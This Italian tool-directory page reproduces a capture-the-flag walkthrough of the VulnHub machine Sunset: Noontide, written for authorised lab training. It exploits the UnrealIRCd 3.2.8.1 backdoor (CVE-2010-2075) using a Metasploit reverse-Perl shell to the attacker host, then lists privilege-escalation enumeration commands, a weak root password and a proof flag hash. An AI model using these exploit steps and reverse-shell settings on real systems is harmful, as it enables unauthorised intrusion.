Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
sunset-noontide-pentesting — Descrizione Valutazione professionale di penetration testing della macchina VulnHub Sunset: Noontide, che copre ricognizione, enumerazione dei servizi, sfruttamento di CVE-2010-2075, post-sfruttamento, escalation dei privilegi e compromissione completa del sistema. | Kitploit
Strumenti/GitHubGitHub/zales2004/sunset-noontide-pentesting
Escalation di PrivilegiRicognizioneScansione PorteAnalisi delle VulnerabilitàExploitPost-ExploitSicurezza di ReteCTFPenetration Testing

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Apprendimento e Formazione
Red Teaming
Lab e Pratica
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

Descrizione Valutazione professionale di penetration testing della macchina VulnHub Sunset: Noontide, che copre ricognizione, enumerazione dei servizi, sfruttamento di CVE-2010-2075, post-sfruttamento, escalation dei privilegi e compromissione completa del sistema.

Vedi Repository
2120 giorni faNon ancora revisionato

Sunset: Noontide — Penetration Testing

Una valutazione professionale di penetration testing e walkthrough CTF di Sunset: Noontide, una macchina intenzionalmente vulnerabile di VulnHub.

Questo progetto documenta il ciclo di vita completo del penetration testing, inclusi ricognizione, enumerazione dei servizi, ricerca delle vulnerabilità, sfruttamento, accesso iniziale, post-sfruttamento, escalation dei privilegi, prova di compromissione, valutazione del rischio, mappatura MITRE ATT&CK e remediation.

⚠️ Disclaimer: Questa valutazione è stata eseguita contro una macchina intenzionalmente vulnerabile in un ambiente di laboratorio autorizzato. Le tecniche e i comandi documentati qui sono destinati esclusivamente a sistemi per i quali è stata ottenuta un'autorizzazione esplicita.


🎯 Obiettivi

  • Identificare l'host di destinazione
  • Enumerare i servizi esposti
  • Identificare software e versioni vulnerabili
  • Ricercare le vulnerabilità applicabili
  • Sfruttare il servizio vulnerabile
  • Ottenere l'accesso iniziale alla shell
  • Eseguire l'enumerazione post-sfruttamento su Linux
  • Identificare le opportunità di escalation dei privilegi
  • Ottenere l'accesso a livello root
  • Recuperare i file di prova utente e root
  • Documentare i risultati di sicurezza
  • Fornire raccomandazioni di remediation

🖥️ Ambiente di Laboratorio

ComponenteDettagli
TargetSunset: Noontide
PiattaformaVulnHub
IP Target10.106.186.186
Hostname Targetnoontide
OS TargetDebian GNU/Linux 10 (Buster)
Architetturax86_64
Piattaforma AttaccanteKali Linux
IP Attaccante10.106.186.204
Tipo di ValutazioneValutazione di Laboratorio Autorizzata
Rischio ComplessivoCRITICO
Risultato della ValutazioneCompromissione Totale del Sistema

🔐 Catena di Attacco

Target Discovery → Enumerazione Nmap → UnrealIRCd 3.2.8.1 Identificato → SearchSploit → CVE-2010-2075 Identificato → Sfruttamento con Metasploit → Shell di Comando Remota → Shell come server → Post-Sfruttamento Linux → Credenziale Root Debole → su root → UID 0 / Accesso Root → File di Prova Utente e Root


1. Ricognizione

È stata eseguita una scoperta iniziale della rete per identificare il target vulnerabile.

Il target è stato infine identificato come:

10.106.186.186

Durante la ricognizione, 10.106.186.142 è stato identificato come gateway predefinito anziché come target previsto.

Ciò evidenzia l'importanza di identificare correttamente il target prima di eseguire ulteriori test di sicurezza, in particolare in una rete di laboratorio bridged o condivisa.


2. Enumerazione dei Servizi

È stata eseguita la rilevazione dei servizi e delle versioni con Nmap contro il target utilizzando:

nmap -sV 10.106.186.186

Il servizio esposto significativo identificato durante la valutazione è stato:

6667/tcp open irc UnrealIRCd

È stata poi eseguita una scansione più dettagliata utilizzando:

nmap -sC -sV -Pn -p 6667 10.106.186.186

Il servizio è stato identificato come:

UnrealIRCd 3.2.8.1

Il servizio IRC riportava inoltre:

irc.foonet.com

Il servizio UnrealIRCd esposto è diventato la principale superficie di attacco investigata durante la valutazione.


3. Ricerca delle Vulnerabilità

SearchSploit è stato utilizzato per investigare le vulnerabilità documentate pubblicamente associate alla versione di UnrealIRCd scoperta.

Comando:

searchsploit UnrealIRCd 3.2.8.1

Il risultato rilevante è stato:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

La vulnerabilità è stata identificata come:

CVE-2010-2075

Vulnerabilità

UnrealIRCd 3.2.8.1 Backdoor Command Execution

Gravità

Critica

Tipo di Attacco

Remote Command Execution

Impatto sulla Sicurezza

Lo sfruttamento riuscito del servizio vulnerabile consente a un attaccante di eseguire comandi in remoto sul sistema di destinazione.


4. Sfruttamento con Metasploit

Il servizio IRC vulnerabile è stato sfruttato utilizzando il Metasploit Framework.

Il modulo selezionato è stato:

exploit/unix/irc/unreal_ircd_3281_backdoor

Configurazione di esempio:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

I tentativi iniziali con il payload non hanno prodotto una sessione utilizzabile.

È stato successivamente selezionato un payload Unix reverse-Perl compatibile:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

Metasploit ha riportato che il target appariva vulnerabile e ha aperto con successo una sessione di command-shell.


5. Accesso Iniziale

La shell ottenuta è stata verificata utilizzando:

whoami

Risultato:

server

Ciò ha confermato l'esecuzione riuscita di comandi in remoto come account server.

La directory di lavoro iniziale era:

/home/server/irc/Unreal3.2

A questo punto, la valutazione è passata dallo sfruttamento remoto del servizio all'enumerazione locale post-sfruttamento.


6. Enumerazione Post-Sfruttamento

Dopo aver ottenuto la shell, è stata eseguita l'enumerazione standard di Linux per comprendere l'host compromesso e identificare potenziali percorsi di escalation dei privilegi.

Utente Corrente

Comando:

id

Risultato:

uid=1000(server) gid=1000(server)

L'account era un utente non-root.

Hostname

Comando:

hostname

Risultato:

noontide

Informazioni sul Kernel

Comando:

uname -a

Risultato:

Linux noontide 4.19.0-10-amd64 x86_64

Sistema Operativo

Comando:

cat /etc/os-release

Risultato:

Debian GNU/Linux 10 (buster)

Questi comandi hanno stabilito l'identità corrente, l'hostname, la versione del kernel, il sistema operativo e la configurazione generale del sistema.


7. Enumerazione per l'Escalation dei Privilegi

Sono stati eseguiti diversi controlli standard per l'escalation dei privilegi su Linux.

7.1 Enumerazione SUID

Comando:

find / -perm -4000 -type f 2>/dev/null

Sono stati identificati binari SUID standard come passwd, chsh, mount, umount, su, chfn, newgrp e gpasswd.

Non è stato identificato alcun binario SUID personalizzato o anomalo evidente come vettore di escalation riuscito.


7.2 Enumerazione Sudo

Comando:

sudo -l

Non è stato identificato alcun percorso utile di escalation dei privilegi basato su sudo dall'output disponibile.


7.3 Enumerazione Cron

Comandi:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

I job pianificati osservati erano job di sistema standard in stile Debian.

Non è stato identificato alcun job cron root scrivibile evidente.


7.4 Enumerazione dei File Scrivibili

Comando:

find / -writable -type f 2>/dev/null | head -100

I risultati iniziali erano principalmente pseudo-file in /proc e non hanno rivelato un vettore pratico di escalation dei privilegi.


7.5 Linux Capabilities

Comando:

getcap -r / 2>/dev/null

Non è stata identificata alcuna escalation dei privilegi utile basata su capability dall'output risultante.


8. Escalation dei Privilegi

Il percorso di escalation dei privilegi riuscito si è basato sulle credenziali root intenzionalmente deboli configurate sulla macchina vulnerabile.

L'account root è stato accessibile utilizzando:

su root

Password:

root

L'accesso root è stato poi verificato utilizzando:

id

Risultato:

uid=0(root) gid=0(root) groups=0(root)

L'identità è stata inoltre confermata utilizzando:

whoami

Risultato:

root

Ciò ha confermato il controllo amministrativo completo del sistema di destinazione.


9. Prova di Compromissione

9.1 Prova a Livello Utente

Il file di prova a livello utente era situato in:

/home/server/local.txt

Comando:

cat /home/server/local.txt

Risultato:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 Prova a Livello Root

Scarica lo strumento